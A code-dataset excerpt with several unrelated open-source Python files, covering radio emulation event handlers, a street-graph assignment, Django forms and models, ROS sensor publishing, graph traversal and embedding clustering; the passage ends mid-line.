continue\n\n events = handlers[eventtype](moduleid, eventtype, eventargs)\n\n for nem,event in list(events.items()):\n service2.publish(nem, event)\n\n logline = 'process eventtype \"%s\" to nems {%s}' % \\\n (eventtype, ','.join(map(str, sorted(events.keys()))))\n\n self.log(lfd, logline)\n\n except Exception as e:\n self.log(lfd, e)\n\n # exit from daemonized path\n sys.exit(0)\n\n\n def allinformed_pathloss(self, moduleid, eventtype, eventargs):\n # -Inf nem:1-3,7 allinformedpathloss 90\n nems = nodestr_to_nodelist(moduleid.split(':')[1])\n\n pathloss = float(eventargs[0])\n\n events = defaultdict(lambda: PathlossEvent())\n\n for x, y in itertools.product(nems, nems):\n if x == y:\n # ignore self node pathloss\n continue\n\n events[x].append(y, forward=pathloss)\n\n events[y].append(x, forward=pathloss)\n\n return events\n\n\n def location_gps(self, moduleid, eventtype, eventargs):\n # -Inf nem:45 location gps 40.025495,-74.315441,3.0\n location_nem = int(moduleid.split(':')[1])\n\n toks = eventargs[1].split(',')\n\n lat, lon, alt = list(map(float, toks[0:3]))\n\n self._location_cache[location_nem] = (lat,lon,alt)\n\n events = defaultdict(lambda: LocationEvent())\n\n # all events are sent to nemid 0 - ie, received by every nem\n events[0].append(location_nem, latitude=lat, longitude=lon, altitude=alt)\n\n return events\n\n\n def orientation(self, moduleid, eventtype, eventargs):\n # -Inf nem:45 orientation 3.0,4.0,5.0\n nem = int(moduleid.split(':')[1])\n\n if not nem in self._location_cache:\n raise ValueError('An orientation EEL sentence for nem \"%d\" '\n 'has been specified without an associated '\n 'location sentence. Quitting.'\n % nem)\n\n toks = eventargs[0].split(',')\n\n lat, lon, alt = self._location_cache[nem]\n\n pitch, roll, yaw = list(map(float, toks[0:3]))\n\n events = defaultdict(lambda: LocationEvent())\n\n events[0].append(nem,\n latitude=lat,\n longitude=lon,\n altitude=alt,\n pitch=pitch,\n roll=roll,\n yaw=yaw)\n\n return events\n\n\n def velocity(self, moduleid, eventtype, eventargs):\n # -Inf nem:45 velocity 30.0,20.0,200.0\n nem = int(moduleid.split(':')[1])\n\n if not nem in self._location_cache:\n raise ValueError('A velocity EEL sentence for nem \"%d\" '\n 'has been specified without an associated '\n 'location sentence. Quitting.'\n % nem)\n\n toks = eventargs[0].split(',')\n\n lat, lon, alt = self._location_cache[nem]\n\n azimuth, elevation, magnitude = list(map(float, toks[0:3]))\n\n events = defaultdict(lambda: LocationEvent())\n\n events[0].append(nem,\n latitude=lat,\n longitude=lon,\n altitude=alt,\n azimuth=azimuth,\n elevation=elevation,\n magnitude=magnitude)\n\n return events\n\n\n def fadingselection(self, moduleid, eventtype, eventargs):\n from emane.events import FadingSelectionEvent\n\n # -Inf nem:4 fadingselection nem:1,none nem:2,nakagami\n nem = int(moduleid.split(':')[1])\n\n events = defaultdict(lambda: FadingSelectionEvent())\n\n for eventarg in eventargs:\n m = re.match('nem:(?P\\d+),(?P\\w+)', eventarg)\n\n # all events are sent to nemid 0 - ie, received by every nem\n events[0].append(int(m.group('nem')), model=m.group('model'))\n\n return events\n\n\n def pathloss(self, moduleid, eventtype, eventargs):\n # -Inf nem:1 pathloss nem:2,90 nem:3,90 nem:4,90 nem:5,90 nem:6,90 nem:7,90 nem:8,200\n sending_nem = int(moduleid.split(':')[1])\n\n receiving_nems = {}\n\n for eventarg in eventargs:\n receiving_nem, pathloss = eventarg[eventarg.find(':')+1:].split(',')\n\n receiving_nems[int(receiving_nem)] = float(pathloss)\n\n events = defaultdict(lambda: PathlossEvent())\n\n for x, y in itertools.product([sending_nem], receiving_nems):\n if x == y:\n # ignore self node pathloss\n continue\n\n events[x].append(y, forward=receiving_nems[y])\n\n events[y].append(x, forward=receiving_nems[y])\n\n return events\n\n\n def antennaprofile(self, moduleid, eventtype, eventargs):\n # TIME nem:ID antennaprofile profileid,azimuth,elevation\n nem = int(moduleid.split(':')[1])\n\n events = defaultdict(lambda: AntennaProfileEvent())\n\n for eventarg in eventargs:\n profileid, azimuth, elevation = eventarg.split(',')\n\n events[0].append(nemId=nem, profile=int(profileid), azimuth=float(azimuth), elevation=float(elevation))\n\n return events\n\n\n def log(self, lfd, log):\n lfd.write('%s: %s\\n' % (etce.timeutils.getstrtimenow(), log))\n\n lfd.flush()\n\n\n def stop(self, ctx):\n pass\n","repo_name":"adjacentlink/python-etce","sub_path":"etcewrappers/emane/emanephyinit.py","file_name":"emanephyinit.py","file_ext":"py","file_size_in_byte":13032,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"36103380787","text":"\"\"\"\n\nName: Libang Liang\nStudent ID: 20662701\nEmail: l38liang@uwaterloo.ca\nElectrical and Computer Engineering, University of Waterloo\na1ece650.py\n\n\"\"\"\nfrom __future__ import print_function\nimport sys\nimport re\n\nimport calculateGraph\n\n#a \"Libang Street\" (1,2) (3,4) (5,6)\nstreetList = {}\n# YOUR CODE GOES HERE\n\ndef main():\n ### YOUR MAIN CODE GOES HERE\n\n ### sample code to read from stdin.\n ### make sure to remove all spurious print statements as required\n ### by the assignment\n while True:\n try:\n line = raw_input()\n # if line != '\\n': # just hit enter will not check anything, prevent index out of range\n checkCommand(line)\n except EOFError:\n sys.exit()\n\n # for line in sys.stdin.readline():\n # checkCommand(line)\n # sys.exit()\n\n # print 'read a line:', line\n\n # except Exception as exp:\n # print(\"Error: \" + str(exp))\n # # return exit code 0 on successful termination\n # sys.exit(0)\n\ndef checkCommand(command):\n # remove all leading white space using .lstrip()\n # command = command.lstrip()\n\n if checkValid(command):\n if command[0] == 'a': # add a street\n addStreet(command)\n\n elif command[0] == 'c': # change a street\n changeStreet(command)\n\n elif command[0] == 'r': # remove a street\n removeStreet(command)\n\n elif command[0] == 'g': # produce output\n produceOutput()\n\n else:\n pass\n # print(\"Error: Your command is not valid, please type again\", file=sys.stderr)\n\ndef addStreet(command):\n # print(\"enter add street function\")\n streetName = re.findall('\"([^\"]*)\"', command) #list contains only one string\n lineSegment = re.findall('\\(([^)]+)',command) #list of strings\n coords = [map(int, i.split(',')) for i in lineSegment] # Convert list of string to list of coordinates\n\n # Check if input is already in the list\n if streetName[0].lower() in [key.lower() for key in streetList.keys()]: # Case insensitive\n print(\"Error: '\" + streetName[0] + \"' is already in the list! You can modify this street using 'c'\")\n else:\n streetList[streetName[0]] = coords #key is the street name, content is the line segment\n # print('Street successfully added!')\n\n # print('Current street list is shown below:\\n')\n\n\ndef changeStreet(command):\n\n streetName = re.findall('\"([^\"]*)\"', command) # list contains only one string\n\n existNameList = streetList.keys()\n foundStreet = False\n\n for i in range(len(existNameList)):\n if streetName[0].lower() == existNameList[i].lower():\n foundStreet = True\n lineSegment = re.findall('\\(([^)]+)', command) # list of strings\n coords = [map(int, j.split(',')) for j in lineSegment] # Convert list of string to list of coordinates\n streetList[existNameList[i]] = coords # Replace the line segment with new input\n if foundStreet == False:\n print(\"Error: 'c' specified for a street that does not exist.\")\n\n\ndef removeStreet(command):\n\n streetName = re.findall('\"([^\"]*)\"', command) # list contains only one string\n existNameList = streetList.keys()\n foundStreet = False\n\n for i in range(len(existNameList)):\n if streetName[0].lower() == existNameList[i].lower():\n foundStreet = True\n del streetList[existNameList[i]] # Delete from Dictionary\n # print(str(streetList))\n if foundStreet == False:\n print(\"Error: 'r' specified for a street that does not exist.\")\n\ndef produceOutput():\n vertexList, edgeList = calculateGraph.produceVertexOutput(streetList)\n\n # Produce vertex list string specified in assignment 1\n vertexOutputString = \"V = {\\n\"\n for i in range(len(vertexList)):\n coordX = outputDecimalFormating(vertexList[i][0])\n coordY = outputDecimalFormating(vertexList[i][1])\n vertexOutputString += \" {:<4}({},{})\\n\".format(str(i+1)+\":\",coordX,coordY)\n vertexOutputString = vertexOutputString + \"}\"\n print(vertexOutputString)\n\n # Produce edge list string specified in assignment 1\n edgeOutputString = \"E = {\\n\"\n for i in range(len(edgeList)):\n pointOne = edgeList[i][0]\n pointTwo = edgeList[i][1]\n edgeOutputString += \" <\" + str(pointOne) + \",\" + str(pointTwo) + \">\"\n if i < len(edgeList)-1:\n edgeOutputString += \",\\n\"\n else:\n edgeOutputString += \"\\n\"\n edgeOutputString = edgeOutputString + \"}\"\n print(edgeOutputString)\n\n\ndef outputDecimalFormating(x):\n return '{0:.2f}'.format(x)\n # if isinstance(x,float):\n # if x.is_integer():\n # return str(int(x))\n # else:\n # return '{0:.2f}'.format(x)\n # else:\n # return str(x)\n\ndef checkValid(command):\n\n if command == \"\":\n print(\"Error: Empty input, a: add street, c: change street, r: remove street, g: produce output\")\n return False\n #for 'a' and 'c':\n if command[0] == 'a' or command[0] == 'c':\n pattern = re.compile(\"^[ac]\\s\\s*\\\"[A-Za-z ]+\\\"\\s\\s*(\\([-]?[0-9]+,[-]?[0-9]+\\)\\s*){2,}$\")\n result = pattern.match(command)\n if result != None: # Found correct command\n return True\n else:\n print(\"Error: In 'a' or 'c', Your command is not valid, please type again\")\n return False\n\n # for 'r':\n elif command[0] == 'r':\n pattern = re.compile(\"^[r]\\s\\s*\\\"[a-zA-Z ]+\\\"\\s*$\") # ^: start of string, $: end of string\n result = pattern.match(command)\n if result != None:\n return True\n else:\n print(\"Error: In 'r', Your command is not valid, please type again\")\n return False\n\n elif command[0] == 'g':\n pattern = re.compile(\"^[g]\\s*$\")\n result = pattern.match(command)\n if result != None:\n return True\n else:\n print(\"Error: In 'g', Your command is not valid, please type again\")\n return False\n\n else:\n print(\"Error: Your command should start with 'a', 'c', 'r' or 'g', please type again\")\n return False\n\n\n\ndef printStreetList():\n print(streetList)\n\nif __name__ == '__main__':\n main()","repo_name":"ECE-UW/assignment-1-llbllbllbllb","sub_path":"a1ece650.py","file_name":"a1ece650.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19375443539","text":"import urllib.parse\nfrom django import forms\nfrom django.utils.safestring import mark_safe\n\n\ndef _name_with_url(bookmark):\n html = '%s' % (bookmark.dashboard_url(), bookmark.name)\n return mark_safe(html)\n\n\nclass BookmarkListForm(forms.Form):\n org_bookmarks = forms.MultipleChoiceField(\n label=\"Alerts about organisations\", widget=forms.CheckboxSelectMultiple()\n )\n search_bookmarks = forms.MultipleChoiceField(\n label=\"Alerts about searches\", widget=forms.CheckboxSelectMultiple()\n )\n ncso_concessions_bookmarks = forms.MultipleChoiceField(\n label=\"Alerts about NCSO price concessions\",\n widget=forms.CheckboxSelectMultiple(),\n )\n\n def __init__(self, *args, **kwargs):\n \"\"\"Populate choices with those passed in, and remove fields with no\n choices.\n\n \"\"\"\n org_bookmarks = kwargs.pop(\"org_bookmarks\", [])\n search_bookmarks = kwargs.pop(\"search_bookmarks\", [])\n ncso_concessions_bookmarks = kwargs.pop(\"ncso_concessions_bookmarks\", [])\n super(BookmarkListForm, self).__init__(*args, **kwargs)\n if org_bookmarks:\n self.fields[\"org_bookmarks\"].choices = [\n (x.id, _name_with_url(x)) for x in org_bookmarks\n ]\n else:\n del self.fields[\"org_bookmarks\"]\n if search_bookmarks:\n self.fields[\"search_bookmarks\"].choices = [\n (x.id, _name_with_url(x)) for x in search_bookmarks\n ]\n else:\n del self.fields[\"search_bookmarks\"]\n if ncso_concessions_bookmarks:\n self.fields[\"ncso_concessions_bookmarks\"].choices = [\n (x.id, _name_with_url(x)) for x in ncso_concessions_bookmarks\n ]\n else:\n del self.fields[\"ncso_concessions_bookmarks\"]\n\n\nclass SearchBookmarkForm(forms.Form):\n email = forms.EmailField(\n label=\"\",\n error_messages={\n \"required\": \"This can't be blank!\",\n \"invalid\": \"Please enter a valid email address\",\n },\n widget=forms.TextInput(attrs={\"placeholder\": \"Email address\", \"size\": \"35\"}),\n )\n url = forms.CharField(widget=forms.HiddenInput(), required=True)\n name = forms.CharField(widget=forms.HiddenInput(), required=True)\n\n def clean_name(self):\n name = self.cleaned_data[\"name\"]\n return urllib.parse.unquote(name)\n\n def clean_url(self):\n url = self.cleaned_data[\"url\"]\n return urllib.parse.unquote(url)\n\n\nclass OrgBookmarkForm(forms.Form):\n email = forms.EmailField(\n label=\"\",\n error_messages={\n \"required\": \"This can't be blank!\",\n \"invalid\": \"Please enter a valid email address\",\n },\n widget=forms.TextInput(attrs={\"placeholder\": \"Email address\", \"size\": \"35\"}),\n )\n pct_id = forms.CharField(widget=forms.HiddenInput(), required=False)\n practice_id = forms.CharField(widget=forms.HiddenInput(), required=False)\n pcn_id = forms.CharField(widget=forms.HiddenInput(), required=False)\n\n\nclass NCSOConcessionBookmarkForm(forms.Form):\n email = forms.EmailField(\n label=\"\",\n error_messages={\n \"required\": \"This can't be blank!\",\n \"invalid\": \"Please enter a valid email address\",\n },\n widget=forms.TextInput(attrs={\"placeholder\": \"Email address\", \"size\": \"35\"}),\n )\n pct_id = forms.CharField(widget=forms.HiddenInput(), required=False)\n practice_id = forms.CharField(widget=forms.HiddenInput(), required=False)\n\n\nclass FeedbackForm(forms.Form):\n\n # This incredibly crude captcha technique has proved enough in the past to\n # deter spam bots which blindly fill out any contact form they can find\n HUMAN_TEST_ANSWER = \"health\"\n\n email = forms.EmailField()\n name = forms.CharField()\n subject = forms.CharField()\n human_test = forms.CharField(\n label='Please type the word \"{}\" to show you\\'re not a robot'.format(\n HUMAN_TEST_ANSWER\n )\n )\n message = forms.CharField(widget=forms.Textarea)\n\n def clean_human_test(self):\n data = self.cleaned_data[\"human_test\"]\n if data.strip().lower() != self.HUMAN_TEST_ANSWER:\n raise forms.ValidationError(\n 'Sorry, you need to put the word \"{}\" here'.format(\n self.HUMAN_TEST_ANSWER\n )\n )\n","repo_name":"StefHill/openprescribing","sub_path":"openprescribing/frontend/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"44052403418","text":"# -*- coding: utf-8 -*-\n# @Author: Marte\n# @Date: 2019-04-13 13:57:54\n# @Last Modified by: Marte\n# @Last Modified time: 2019-04-13 14:10:57\n#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport os\n\nfr = open('cnblogs_php3','r',encoding='utf-8')\nfw = open('cnblogs_php4','a',encoding='utf-8')\nurls = fr.read()\nurl = ''\n# print(urls)\nwhile(urls.find('https://www.cnblogs.com') != -1):\n url = urls[urls.find('https://www.cnblogs.com'):urls.find('.html')+5]+'\\n'\n urls = urls[urls.find('.html')+5:]\n fw.write(url)\n print(url)\nfw.close()\nfr.close()\n","repo_name":"iwangchuanli/Project-experience","sub_path":"python/python-百度关键字爬虫/SEO/getURL.py","file_name":"getURL.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"21"} +{"seq_id":"11279982770","text":"from serialiser import WriteStream, Modifier, JSONStreamIO, XMLStreamIO, ModifierManager\nfrom io import StringIO\nfrom inspect import getmembers\nfrom pprint import pprint\n\n\nclass StructBuilder(type):\n \"\"\"Adds \"_fields\" member to structs, and sets values to default on construction\"\"\"\n\n def __init__(cls, name, bases, attrs):\n fields = dict(getmembers(cls, lambda x: isinstance(x, Field)))\n cls._fields = fields\n\n super().__init__(name, bases, attrs)\n\n def __call__(cls, *args, **kwargs):\n inst = cls.__new__(cls, *args, **kwargs)\n defaults = {n: f.type() for n, f in cls._fields.items()}\n inst.__dict__.update(defaults)\n cls.__init__(inst, *args, **kwargs)\n return inst\n\n\nclass Field:\n \"\"\"Named and typed Struct member\"\"\"\n\n def __init__(self, type_):\n self.type = type_\n\n\nclass Struct(metaclass=StructBuilder):\n\n def print(self):\n pprint(\"{}({})\".format(self.__class__.__name__, \", \"\n .join((\"{}={!r}\".format(k, getattr(self, k)) for k in self._fields))))\n\n\nclass StructModifierBase(Modifier):\n\n @classmethod\n def compose(cls, stream, ctx):\n struct = cls.modifies()\n\n for name in struct._fields:\n value = stream.read(name)\n setattr(struct, name, value)\n\n return struct\n\n @classmethod\n def decompose(cls, struct, stream, ctx):\n for name in struct._fields:\n value = getattr(struct, name)\n stream.write(name, value)\n\n @classmethod\n def build(cls, modifies_cls):\n cls_dict = dict(modifies=modifies_cls, name=modifies_cls.__name__)\n return type('{}Modifier'.format(modifies_cls.__name__), (cls,), cls_dict)\n\n\nclass SomeStruct(Struct):\n \"\"\"Struct with score, name, age fields.\"\"\"\n score = Field(float)\n name = Field(str)\n age = Field(int)\n\n\nif __name__ == '__main__':\n # Build list of modifiers for all Struct subclasses (list of the results of calling StructModifierBase.build on each struct subclass)\n modifiers = list(map(StructModifierBase.build, Struct.__subclasses__()))\n modifier_manager = ModifierManager(modifiers=modifiers)\n\n # Something to serialise\n serialisable = SomeStruct()\n serialisable.score = 99.9\n serialisable.age = 12\n serialisable.name = 'Bob'\n\n # Write to a write_stream\n write_stream = WriteStream(modifier_manager=modifier_manager)\n\n # We can do this (below) because we created a modifier that decomposes / composes this class\n write_stream.write('some_serialisable', serialisable)\n # Create stream IO with string object\n string_file = StringIO()\n stream_io_cls = JSONStreamIO\n stream_io = stream_io_cls(string_file)\n\n # Dump to file\n stream_io.dump(write_stream)\n\n # Print output data\n print(stream_io_cls.__name__, string_file.getvalue())\n\n # Reload from data file\n string_file.seek(0)\n read_stream = stream_io.load(modifier_manager=modifier_manager)\n\n # Read directly from stream\n serialisable_2 = read_stream.read('some_serialisable')\n serialisable_2.print()","repo_name":"agoose77/basic_serialisation","sub_path":"struct_example.py","file_name":"struct_example.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"158976703","text":"def display(arr,n):\n for i in range(n):\n print(arr[i],end=\" \")\n print()\ndef selection(arr,n):\n for i in range(n-1):\n min=i\n for j in range(i+1,n):\n if(arr[min]>arr[j]):\n min=j\n arr[i],arr[min]=arr[min],arr[i]\n display(arr,n)\n \ndef bubble(arr,n):\n for i in range(n-1):\n for j in range(0,n-1-i):\n if(arr[j]>arr[j+1]):\n arr[j],arr[j+1]=arr[j+1],arr[j]\n #display(arr,n)\n print(\"Done\")\n display(arr,n)\n \narr=[]\nn=int(input(\"Enter no of ele :\"))\nfor i in range(n):\n arr.append(int (input()))\nselection(arr,n)\nprint()\n#bubble(arr,n)\nif(len(arr)>=5):\n print(\"Top 5 scores of students are :\",arr[len(arr)-5:len(arr)])\n ","repo_name":"Meetagarwal1234/Fdsl_Lab_Codes","sub_path":"assign5.py","file_name":"assign5.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25346377440","text":"from PIL import Image\nfrom qiskit import QuantumCircuit, transpile, assemble, Aer\nfrom qiskit.visualization import plot_bloch_multivector\n\n# Load the PNG file\nimage = Image.open('/content/sample_data/image (2).png')\nimage_data = image.tobytes()\n\n# Convert the image data to binary\nbinary_data = ''.join(format(byte, '08b') for byte in image_data)\n\n# Create a quantum circuit\nnum_qubits = len(binary_data)\nqc = QuantumCircuit(num_qubits, num_qubits)\n\n# Encode the binary data into the quantum state\nfor i, bit in enumerate(binary_data):\n if bit == '1':\n qc.x(i)\n\n# Simulate the quantum state\nsimulator = Aer.get_backend('statevector_simulator')\njob = assemble(transpile(qc, simulator), backend=simulator)\nresult = simulator.run(job).result()\nstatevector = result.get_statevector()\n\n# Visualize the quantum state\nplot_bloch_multivector(statevector)\n","repo_name":"akriot/quant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3123090483","text":"import rclpy\nfrom rclpy.node import Node\nfrom sensor_msgs.msg import BatteryState\n\n\nimport smbus\nfrom ina220 import INA220\n\n\nclass RosIna220Publisher(Node):\n\n def __init__(self):\n super().__init__('ros_ina220_publisher')\n\n bus = smbus.SMBus(1)\n self.ina220 = INA220(i2c_addr=0x41, i2c_dev=bus)\n\n self.publisher_ = self.create_publisher(BatteryState, 'ina220/data', 10)\n timer_period = 0.1 # seconds\n self.timer = self.create_timer(timer_period, self.timer_callback)\n\n def timer_callback(self):\n current_draw, bus_voltage, shunt_voltage = self.ina220.get_measurements()\n\n msg = BatteryState()\n msg.header.stamp = self.get_clock().now().to_msg()\n msg.header.frame_id = \"ros_ina220\"\n\n msg.current = current_draw\n msg.voltage = bus_voltage\n\n self.publisher_.publish(msg)\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n ros_ina220_publisher = RosIna220Publisher()\n\n rclpy.spin(ros_ina220_publisher)\n\n # Destroy the node explicitly\n # (optional - otherwise it will be done automatically\n # when the garbage collector destroys the node object)\n ros_ina220_publisher.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"rosblox/ros-ina220","sub_path":"ros_ina220/ros_ina220/publisher_member_function.py","file_name":"publisher_member_function.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2818388717","text":"import queue\n\nclass Edge:\n def __init__(self, p, n, c=0):\n self.previous = p\n self.next = n\n self.cost = c\n\nclass Graph:\n def __init__(self, size):\n self.num_nodes = size\n self.adjacency_list = [list() for x in range(size)]\n\n def add_edge(self, p, n, c=0):\n self.adjacency_list[p].append(Edge(p, n, c))\n self.adjacency_list[n].append(Edge(n, p, c))\n\n def __str__(self):\n string = list()\n for i, lst in enumerate(self.adjacency_list):\n string.append(f'{i}-')\n for edge in lst:\n string.append(f'->{edge.next}')\n string.append('\\n')\n return ''.join(map(str, string))\n\n def bfs_traversal(self, start):\n string = list()\n q = queue.Queue()\n visited = [False for x in range(self.num_nodes)]\n q.put((start, 1))\n while not q.empty():\n node, level = q.get()\n if not visited[node]:\n visited[node] = True\n string.append(f'->({node}, {level})')\n for edge in self.adjacency_list[node]:\n q.put((edge.next, level + 1))\n return ''.join(map(str, string))\n\n def dfs_traversal(self, start):\n string = list()\n q = queue.LifoQueue()\n visited = [False for x in range(self.num_nodes)]\n q.put((start, 1))\n while not q.empty():\n node, level = q.get()\n if not visited[node]:\n visited[node] = True\n string.append(f'->({node}, {level})')\n for edge in self.adjacency_list[node]:\n q.put((edge.next, level + 1))\n return ''.join(map(str, string))\n\n\nif __name__ == '__main__':\n num_graphs = int(input())\n for i in range(num_graphs):\n nodes, edges = map(int, input().split())\n graph = Graph(nodes)\n for j in range(edges):\n p, n = map(int, input().split('-'))\n graph.add_edge(p, n)\n print(f'-- Graph --\\n{str(graph)}')\n for i in [0, 6, 3, 7]:\n print(f'-- BFS Traversal --\\n{graph.bfs_traversal(i)}')\n for i in [0, 6, 3, 7]:\n print(f'-- DFS Traversal --\\n{graph.dfs_traversal(i)}')\n\n","repo_name":"akashkw/practice","sub_path":"python/algos_ds/graph/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22479770871","text":"from django.db import models\nfrom django.core.validators import MinValueValidator\nfrom app_reference.models import Offices\nfrom django.contrib.auth.models import User\nfrom app_printers.models import Printers\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\n\nclass ID_Card(models.Model):\n card_type = models.CharField(\"Card Type\", max_length=200, unique=True)\n description = models.TextField(\"Description\")\n\n amount = models.PositiveIntegerField(\n \"Stock Amount\",\n validators=[MinValueValidator(0)]\n )\n\n class Meta:\n verbose_name = \"ID Card\"\n verbose_name_plural = \"ID Cards\"\n\n def __str__(self):\n return self.card_type\n\n\nclass Printer_Ribbon(models.Model):\n ribbon_type = models.CharField(\"Ribbon Type\", max_length=200, unique=True)\n description = models.TextField(\"Description\")\n\n amount = models.PositiveIntegerField(\n \"Stock Amount\",\n validators=[MinValueValidator(0)]\n )\n\n class Meta:\n verbose_name = \"Printer Ribbon\"\n verbose_name_plural = \"Printer Ribbons\"\n\n def __str__(self):\n return self.ribbon_type\n\n\nclass Active_Stocks(models.Model):\n card_type = models.ForeignKey(\n ID_Card, to_field=\"card_type\",\n on_delete=models.CASCADE\n )\n\n stock_name = models.CharField(\n \"Stock Name\",\n max_length=200,\n unique=True\n )\n\n office = models.ForeignKey(Offices, on_delete=models.CASCADE)\n\n description = models.TextField(\"Description\")\n\n amount = models.PositiveIntegerField(\n \"Stock Amount\",\n validators=[MinValueValidator(0)]\n )\n\n class Meta:\n verbose_name = \"Active Stock\"\n verbose_name_plural = \"Active Stocks\"\n\n def __str__(self):\n return self.stock_name\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n all_types = models.BooleanField('All ID Types', default=True)\n printer = models.ForeignKey(Printers, null=True, blank=True, on_delete=models.CASCADE)\n active_card = models.ForeignKey(Active_Stocks, null=True, blank=True, on_delete=models.CASCADE)\n\n class Meta:\n verbose_name = 'User Profile'\n verbose_name_plural = 'User Profiles'\n\n def __str__(self):\n return self.user.first_name\n\n\n@receiver(post_save, sender=User)\ndef create_user_profile(sender, instance, created, **kwargs):\n if created:\n UserProfile.objects.create(user=instance)\n\n\n@receiver(post_save, sender=User)\ndef save_user_profile(sender, instance, **kwargs):\n instance.userprofile.save()\n","repo_name":"mldvc/lazy-card","sub_path":"app_overview/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37303276897","text":"from flask_script import Manager\nfrom flask import Flask\nfrom db_script import DBManager\n\napp = Flask(__name__)\n\nmanager = Manager(app)\n\n\n@manager.command\ndef test():\n print(\"hello flask script\")\n\n\nmanager.add_command('db', DBManager)\n\nif __name__ == '__main__':\n manager.run()","repo_name":"DavidYusen/PythonCodes","sub_path":"Exercise/0409.py","file_name":"0409.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18984740045","text":"import numpy as np\nimport operator\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom sklearn.cluster import DBSCAN\nfrom sklearn import datasets\nfrom sklearn import metrics\nfrom embeddings import read, plot_with_labels\nfrom sklearn.manifold import TSNE\n\n\ndef get_DBSCAN_clusters(vectors,labels): # 根据DBSCAN聚类后的标签labels整理各类的向量,存放在字典clusters\n clusters = {}\n for i in range(len(labels)):\n if labels[i] not in clusters:\n clusters[labels[i]] = vectors[i]\n elif labels[i] in clusters:\n cur_vec = vectors[i]\n cur_cluster = clusters[labels[i]]\n clusters[labels[i]] = np.row_stack((cur_cluster, cur_vec))\n return clusters\n\ndef get_centers(clusters): # 获得各个类的中心点(噪音类除外)\n centers = {}\n for label in clusters:\n if label == -1: #如果是噪音类\n continue\n else:\n cur_vectors = clusters[label]\n km_model = KMeans(n_clusters=1, max_iter=500, random_state=0).fit(cur_vectors)\n km_labels = km_model.labels_\n km_score = metrics.calinski_harabaz_score(cur_vectors, km_labels)\n print('类标签为%d的K-means聚类得分:%f' % (label, km_score))\n cur_center = km_model.cluster_centers_\n print('类标签为%d的K-means聚类中心:' %label + str(cur_center))\n centers[label] = cur_center\n return centers\n\ndef get_distance(cur_vector, cur_center, method): # 获得与中心点的距离(余弦相似度 or 欧式距离)\n if method == 'cos':\n num = float(np.dot(cur_vector, cur_center.T))\n vec_norm = np.linalg.norm(cur_vector) * np.linalg.norm(cur_center)\n cos = num / vec_norm\n sim = 0.5 + 0.5 * cos # 归一化\n return sim\n elif method == 'ED':\n dist = np.linalg.norm(cur_vector - cur_center)\n return dist\n\ndef distance_sort(vectors, cur_center, method): # 获得根据与中心点距离大小排序后的{词向量:与中心点的距离}\n distance_dict = {}\n for vector in vectors:\n distance = get_distance(vector, cur_center, method)\n distance_dict[vector] = distance\n sorted_distance = sorted(distance_dict.items(), key=operator.itemgetter(1))\n sorted_distance_dict = dict(sorted_distance)\n return sorted_distance_dict\n\ndef get_vectors(filename, word2ind, wordvecs, dim): # 获得测试文本中所有词的词向量\n vectors = np.zeros((1, dim))\n test_file = open(filename, 'r', encoding='utf-8')\n for line in test_file.readlines():\n curline_words = line.split(' ')\n for word in curline_words:\n if word == '\\n':\n continue\n elif word in word2ind:\n cur_index = word2ind[word]\n cur_vec = wordvecs[cur_index]\n vectors = np.row_stack((vectors,cur_vec))\n if len(vectors) > 1:\n vectors = np.delete(vectors, 0, 0)\n test_file.close()\n return vectors\n\ndef get_most_label(test_vectors, clusters): # 获得测试文本中单词数最多的类别\n class_vector = {}\n for vector in test_vectors:\n for label in clusters:\n if vector in clusters[label]:\n if label not in class_vector:\n class_vector[label] = vector\n else:\n class_vector[label] = np.row_stack((class_vector[label], vector))\n break\n assert len(class_vector) > 0\n class_vector = dict(sorted(class_vector.items(), key=operator.itemgetter(0)))\n if len(class_vector) == 1:\n most_label = -1\n print('所有词向量均为噪音!')\n else:\n most_label = 0\n most_num = class_vector[most_label].shape[0]\n for label in class_vector:\n if label == -1 or label == 0:\n continue\n else:\n if class_vector[label].shape[0] > most_num:\n most_num = class_vector[label].shape[0]\n most_label = label\n print('本文中%d类包含的单词最多,单词数为:%d,占本文单词的%f%%' % (most_label, most_num, most_num * 100.0 / test_vectors.shape[0]))\n return most_label\n\ndef main():\n embedding_file = open('../data/model/SE2010.vector', 'r', encoding='utf-8', errors='surrogateescape')\n words, wordvecs = read(embedding_file, dtype=float)\n word2ind = {word: i for i, word in enumerate(words)}\n # vec2ind = {}\n # i = 0\n # for vector in wordvecs:\n # vec2ind[vector] = i\n # i += 1\n # vec2ind = {vector: i for vector in wordvecs, for i in range(len(wordvecs))}\n plot_only = 1000\n db_model = DBSCAN(eps=1.79, 